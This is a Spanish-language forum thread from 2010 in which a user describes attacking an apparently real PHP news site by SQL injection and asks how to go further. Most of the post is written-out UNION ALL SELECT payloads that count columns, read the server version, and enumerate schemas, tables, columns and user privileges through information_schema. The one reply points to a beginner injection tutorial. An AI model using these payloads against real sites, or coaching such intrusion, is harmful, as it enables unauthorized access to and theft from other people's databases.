Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Bugs y Exploits => Hacking => Nivel Web => Mensaje iniciado por: Servia en 21 Marzo 2010, 10:09 AM

Título: Inyección en sistema de noticias
Publicado por: Servia en 21 Marzo 2010, 10:09 AM
Hola, me ha dado por probar un sistema de noticias en php y he empezado a hacer pruebas y creo que estoy dando con algo

Cuando se visualiza una noticia con normalidad:
(http://r.i.elhacker.net/cache?url=http://img696.imageshack.us/img696/3672/alertpaybuxnot.png)

Cuando se intenta visualizar una noticia que no existe (una id.)
(http://r.i.elhacker.net/cache?url=http://img44.imageshack.us/img44/3672/alertpaybuxnot.png)
(Fijarse que la comilla y los // son de cuando Nota de Prensa, Algún Sitio (ejemplo)) - 1/02/2009


He hecho union all select y llego hasta el 11 o sea que la tabla noticias tiene 11 campos y como se puede ver si genero un error, uno de ellos como no es el id.
Cuando hago -1 union all select 1,2,3,4,5,6,7,8,9,10,11--
Me sale esto:
(http://r.i.elhacker.net/cache?url=http://img707.imageshack.us/img707/1790/alertpaybuxnotq.png)


Si pongo en vez de 1,2,3...  1,@@version,3.... me sale la versión del servidor en el primer numero:
15.0.77

He usado esto para ver las columnas:
-1 union all select 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns--

y me muestra esto
(http://r.i.elhacker.net/cache?url=http://img511.imageshack.us/img511/2986/alertpaybuxnotm.png)

Si hago esto para ver las dbs:
-1 union all select 1,schema_name,3,4,5,6,7,8,9,10,11 FROM information_schema.schemata--

Me sale esto:
(http://r.i.elhacker.net/cache?url=http://img403.imageshack.us/img403/9871/alertpaybuxnott.png)

He intentado ver una lista de privilegios con:
-1 union all select 1,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11  FROM+information_schema.user_privileges--

Sale esto:
(http://r.i.elhacker.net/cache?url=http://img256.imageshack.us/img256/8281/alertpaybuxnotv.png)

Usando el PonyMagic (que maravilla por dios.) me indica que tiene 2 tablas y una de ellas es la de noticias y me indica todos los campos.

Con esto que se puedo hacer algo? Como sigo adelante sino?
Título: Re: Inyección en sistema de noticias
Publicado por: Shell Root en 21 Marzo 2010, 19:51 PM
Leeté tutoriales, como esté: http://foro.elhacker.net/nivel_web/sql_injection_para_principiantes_ejemplos_en_aplicaciones_reales-t142203.0.html
Sólo texto | Texto con Imágenes